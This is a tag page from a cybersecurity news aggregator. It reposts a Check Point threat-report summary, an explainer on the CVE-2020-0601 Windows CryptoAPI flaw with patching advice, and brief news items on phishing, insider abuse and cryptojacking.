now browsing by tag
Check Point Research has published its 2020 Cyber Security Report.
The report highlights the main tactics cyber-criminals are using to attack organisations worldwide across all industries and gives cybersecurity professionals and C-Level executives the information they need to protect their organisations from today’s fifth-generation cyber-attacks and threats.
The 2020 Security Report reveals the key attack vectors and techniques observed by Check Point researchers during the past year.
Cryptominers still dominate malware landscape – Even though cryptomining declined during 2019, linked to cryptocurrencies’ fall in value and the closure of the Coinhive operation in March, 38% of companies globally were impacted by crypto-miners in 2019, up from 37% in 2018.
This is because the use of cryptominers remains a low-risk, high-reward activity for criminals
Botnet armies surge in size – 28% of organisations globally were hit by botnet activity, an increase of over 50% compared with 2018.
Emotet was the most common bot malware used, primarily because of its versatility in enabling malware and spam distribution services.
Other botnet actions such as sextortion email activity and DDoS attacks also rose sharply in 2019.
Targeted ransomware hits hard – While the number of impacted organisations is relatively low, the severity of the attack is much higher – as seen in 2019’s damaging attacks against US city administrations.
Criminals are choosing their ransomware targets carefully, with the aim of extorting the maximum revenue possible.
Mobile attacks decline – 27% of organisations worldwide were impacted by cyber-attacks that involved mobile devices in 2019, down from 33% in 2018.
While the mobile threat landscape is maturing, organisations are also increasingly aware of the threat, and are deploying more protection on mobiles.
The year Magecart attacks became an epidemic – These attacks which inject malicious code into e-commerce websites to steal customers’ payment data hit hundreds of sites in 2019, from hotel chains to from commerce giants to SMBs, across all platforms.
Rise in cloud attacks – Currently more than 90% of enterprises use cloud services and yet 67% of security teams complain about the lack of visibility into their cloud infrastructure, security, and compliance.
The magnitude of cloud attacks and breaches has continued to grow in 2019.
Misconfiguration of cloud resources is still the number one cause for cloud attacks, but now we also witness an increasing number of attacks aimed directly at cloud service providers.
“2019 presented a complex threat landscape where nation states, cybercrime organisations and private contractors accelerated the cyber arms race, elevating each other’s capabilities at an alarming pace, and this will continue into 2020,” says Check Point Software Technologies major intelligence officer Lotem Finkelsteen.
“Even if an organisation is equipped with the most comprehensive, state-of-the-art security products, the risk of being breached cannot be completely eliminated. Beyond detection and remediation, organisations need to adopt a proactive plan to stay ahead of cybercriminals and prevent attacks.
“Detecting and automatically blocking the attack at an early stage can prevent damage. Check Point’s 2020 Security Report shares what organisations need to look out for, and how they can win the war against cyber-attacks through key best practices.”
Check Point’s 2020 Security Report is based on data from Check Point’s ThreatCloud intelligence, the largest collaborative network for fighting cybercrime which delivers threat data and attack trends from a global network of threat sensors; from Check Point’s research investigations over the last 12 months; and on a brand new survey of IT professionals and C-level executives that assesses their preparedness for today’s threats.
The report examines the latest emerging threats against various industry sectors, and gives a comprehensive overview of the trends observed in the malware landscape, in emerging data breach vectors, and in nation-state cyber-attacks.
It also includes analysis from Check Point’s thought leaders, to help organisations understand and prepare themselves for today’s and tomorrow’s complex threat landscape.
The post #comptia | #ransomware | Check Point report highlights latest cyber-threats worldwide appeared first on National Cyber Security.
View full post on National Cyber Security
#cybersecurity | #hackerspace | NSA: Microsoft Releases Patch to Fix Latest Windows 10 Vulnerability
NSA discloses a Windows security flaw that leaves more than 900 million devices vulnerable to spoofed digital certificates
The National Security Agency (NSA) isn’t exactly known for wanting to share information about vulnerabilities they discover. In fact, they kept the Microsoft bug known as Eternal Blue a secret for at least five years to exploit it as part of their digital espionage. (At least, you know, until it was eventually discovered and released by hackers).
But maybe they’ve had a change of heart. (If you truly
believe that, I have a bridge to sell you.)
The NSA, in an uncharacteristic show of transparency, recently announced a major public key infrastructure (PKI) security issue that exists in Microsoft Windows operating systems that’s left more than 900 million PCs and servers worldwide vulnerable to spoofing cyberattacks. This vulnerability is one of many vulnerabilities Microsoft released as part of their January 2020 security updates. Maybe they didn’t want a repeat of the last incident. Whatever the reason, we’re just glad they decided to disclose the potential exploit.
This risk of this vulnerability boils down to a weakness in
the application programming interface of Microsoft’s widely used operating
systems. But what exactly is this Windows 10 vulnerability? How does it affect
your organization? And what can you do to fix it?
Let’s hash it out.
What’s the Situation with This Windows 10 Vulnerability?
Windows 10 has been having a rough go of things these past several months in terms of vulnerabilities. In the latest Window 10 vulnerability news, the NSA discovered a vulnerability (CVE-2020-0601) that affects the cryptographic functionality of Microsoft Windows 32- and 64-bit Windows 10 operating systems and specific versions of Windows Server. Basically, the vulnerability exists within the Windows 10 cryptographic application programming interface — what’s also known as CryptoAPI (or what you may know as the good ol’ Crypt32.dll module) — and affects how it validates elliptic curve cryptography (ECC) certificates.
What it does, in a nutshell, is allow users to create websites and software that masquerade as the “real deals” through the use of spoofed digital certificates. A great example of how it works was created by a security researcher, Saleem Rashid, who tweeted images of NSA.com and Github.com getting “Rickrolled.” Essentially, what he did was cause both the Edge and Chrome browsers to spoof the HTTPS verified websites.
Although humorous, Rashid’s simulated attacks are a great
demonstration of how serious the security flaw is. By spoofing a digital
certificate to exploit the security flaw in CryptoAPI, it means that anyone can
pretend to be anyone — even official authorities.
CryptoAPI is a critical component of Microsoft Windows operating systems. It’s what allows developers to secure their software applications through cryptographic solutions. It’s also what validates the legitimacy of software and secure website connections through the use of X.509 digital certificates (SSL/TLS certificates, code signing certificates, email signing certificates, etc.). So, basically, the vulnerability’s a bug in the OS’s appliance for determining whether software applications and emails are secure, and whether secure website connections are legitimate.
So, what the vulnerability does is allow actors to bypass
the trust store by using malicious software that are signed by forged/spoofed ECC
certificates (doing so makes them look like they’re signed by a trusted
organization). This means that users would unknowingly download malicious or
compromised software because the digital signature would appear to be from a
This vulnerability can cause other issues as well, according to the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA):
This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.”
Does This Mean ECC Is Not Secure?
No. This flaw in no way, shape, or form affects the
integrity of ECC certificates. It does, however, cast a negative light on
Windows’ cryptographic application programming interface by shining a spotlight
on the shortcomings of its validation process.
Let me reiterate: This is a flaw concerning Windows
CryptoAPI and does not affect the integrity of the ECC certificates themselves.
If you’re one of the few using ECC certificates (you know, since RSA is still
the more commonly used than ECC), this doesn’t impact the security of your certificates.
The patch from Microsoft addresses the vulnerability to
ensure that Windows CryptoAPI fully validates ECC certificates.
What This Windows 10 Vulnerability Means for Your Organization
Basically, this cryptographic validation security flaw
impacts both the SSL/TLS communication stream encryption and Windows
Authenticode file validation. Malicious actors who decide to exploit the CryptoAPI
vulnerability could use it to:
- defeat trusted network connections to carry out man-in-the-middle (MitM) attacks and compromise confidential information;
- deliver malicious executable code;
- prevent browsers that rely on CryptoAPI from validating malicious certificates that are crafted to appear from an unauthorized hostname; and
- appear as legitimate and trusted entities (through spoofing) to get users to engage with and download malicious content via email and phishing websites.
The NSA press release states:
NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners.”
Steps to Take to Mitigate This Bug
Wondering what you should do to mitigate the threat on your
network and devices? The NSA has a few recommendations:
Get to Patchin’ ASAP
The NSA recommends installing a newly-released patch from Microsoft for Windows 10 operating systems and Windows Server (versions 2016 and 2019) as soon as possible on all endpoints and systems. Like, right now. Get to it! As a best practice, you also can turn on automatic updates to ensure that you don’t miss key updates in the future.
According to Microsoft’s Security Update Guide:
After the applicable Windows update is applied, the system will generate Event ID 1 in the Event Viewer after each reboot under Windows Logs/Application when an attempt to exploit a known vulnerability ([CVE-2020-0601] cert validation) is detected.”
Here at The SSL Store, we’ve already rolled out the patch to ensure that all of our servers and endpoint devices are protected. (Thanks, Ross!) Rolling out these kinds of updates is something you don’t want to wait around to do because it leaves your operating systems — and everything else as a result — vulnerable to spoofing and phishing attacks using spoofed digital certificates.
Prioritize Your Patching Initiatives
But what if you’re a major enterprise that can’t just get it
done with a snap of the fingers? (Yeah, we know how you big businesses
sometimes like to do things.) In that case, they recommend prioritizing
patching your most critical endpoints and those that are most exposed to the
mission-critical systems and infrastructure, internet-facing systems, and
networked servers first.
Implement Network Prevention and Detection Measures
For those of you who route your traffic through proxy
devices, we have some good news. While your endpoints are getting patched, your
proxy devices can help you detect and isolate vulnerable endpoints. That’s
because you can use TLS inspection proxies to validate SSL/TLS certificates
from third parties and determine whether to trust or reject them.
You also can review logs and packet analysis to extract
additional data for analysis and check for malicious or suspicious properties.
*** This is a Security Bloggers Network syndicated blog from Hashed Out by The SSL Store authored by Casey Crane. Read the original post at: https://www.thesslstore.com/blog/nsa-microsoft-releases-patch-to-fix-latest-windows-10-vulnerability/
View full post on National Cyber Security
Source: National Cyber Security – Produced By Gregory Evans Another day and another clever PayPal phishing scam tolearn from to better protect yourself and your organization “In this world, nothing can be said to be certain, except death, taxes, and PayPal phishing email scams,” said Benjamin Franklin. Don’t believe me? Google yourself. Okay, okay, he […] View full post on AmIHackerProof.com
#cybersecurity | #hackerspace | Privileged Access Abuse at the Heart of Latest Malicious Insider Incidents
Source: National Cyber Security – Produced By Gregory Evans While many companies spend a lot of energy protecting their business from external threats, security events initiated by insiders can be just as costly. Malicious insiders not only have intimate knowledge of corporate systems and infrastructure, but they also have something far more powerful: legitimate privileged […] View full post on AmIHackerProof.com
Source: National Cyber Security – Produced By Gregory Evans The Institute of Electrical and Electronics Engineers recently announced its 2020 IEEE Fellows, with numerous Indian American and South Asian-origin engineers making the cut. IEEE Fellowships are conferred by the IEEE Board of Directors upon a person with an outstanding record of accomplishments. The total number […] View full post on AmIHackerProof.com
METAIRIE, La. (AP) — Authorities in Louisiana say a woman has been arrested for pretending to be an attorney and stealing $2 million from a client with special needs. Kristina Galjour was arrested Thursday and charged with bank fraud, computer fraud, theft valued over $25,000, exploitation of the infirm and illegally practicing law without a license. The 57-year-old victim has a developmental disability and inherited a trust fund after his parents died. Jefferson Parish Sheriff’s Capt. Jason Rivarde says Galijour coerced the man into thinking she was an attorney and over a three-year period she emptied his $2 million trust fund. The investigation is ongoing. It’s unclear whether Galijour has an attorney.
View full post on National Cyber Security
Source: National Cyber Security – Produced By Gregory Evans Bringing a consistent form of dark mode is not an easy task, as the existing implementations are very much fragmented. Even the apps from Google don’t have a standard way to toggle the color scheme – some rely on underlying system settings while others sport a […] View full post on AmIHackerProof.com
TCL Communication Technology Holding Ltd., the operator of the BlackBerry Mobile site, is the latest victim of cryptocurrency-loving hackers in the latest of a rash of cryptomining hijacking cases.
The website for BlackBerry Mobile was discovered by a Reddit user last week to be serving up code to visitors from Coinhive, the notorious Monero mining script service. The same person who discovered the code did note that it was only the global TCL- owned Blackberrymobile.com site that was affected, not country-specific sites or those owned by BlackBerry Ltd.
Coinhive itself chimed in on Reddit, saying that one of its users had hacked the Blackberry Mobile website using a vulnerability in the Magento webshop software. “We’re sorry to hear that our service has been misused,” the company said. “This specific user seems to have exploited a security issue in the Magento webshop software (and possibly others) and hacked a number of different sites. We have terminated the account in question for violating our terms of service now.”
TCL is far from the first company to be targeted by cryptomining code, and it won’t be the last. The first outbreaks of cryptomining-related hacking occurred in September, when The Pirate Bay and then Showtime were exposed as using the method. As cryptocurrencies boomed, so instances of hackers and site owners trying to cash in on Monero mining. A RiskIQ report Sept. 26 found that more than 1,000 sites were now hijacking the computing power of site visitors to mine for cryptocurrencies.
By October, leading content delivery network Cloudflare Inc. was the first major provider to crack down on the method, banning all sites from its network that have cryptocurrency mining code installed.
The method spread to apps later the same month, when the first reports emerged of Coinhive scripts appearing in Android apps, and the new attack vector has seemingly continued to grow. Only this weekend, a security researcher discovered 291 apps across third-party Android stores that included the miming code, although they appear to be the same app and code with 291 different names.
Commenting on the Android outbreak, HackRead noted that though the biggest victims of cryptocurrency miners were previously website owners and unsuspecting visitors, now Android users are also at risk. The advice, as always, is to practice safe internet: Do not download unknown apps from Android stores, make sure they have up-to-date antivirus software installed and keep an eye on their processor usage because cryptocurrency miners trigger high usage.
The post BlackBerry #Mobile site the #latest #target of #cryptocurrency mining #hackers appeared first on National Cyber Security Ventures.
View full post on National Cyber Security Ventures
We hear it all the time: A celebrity’s been hacked. Their private photos leaked. Now there are hackers preying on everyone’s fear that this could happen, using one of the most trusted names in technology. An urgent warning coming tonight from Charlotte’s Better Business Bureau with what you need to…
View full post on National Cyber Security Ventures
Without a doubt, hoverboards are the latest fad. Hoverboards are indeed very useful as these aren’t only easy to use but make traveling so much fun. The recent trend of trying to make every device internet connected has not spared hoverboards; they even come with rider applications. The app allows…
The post Remotely Controllable Hoverboards Latest Target of Hackers appeared first on National Cyber Security Ventures.
View full post on National Cyber Security Ventures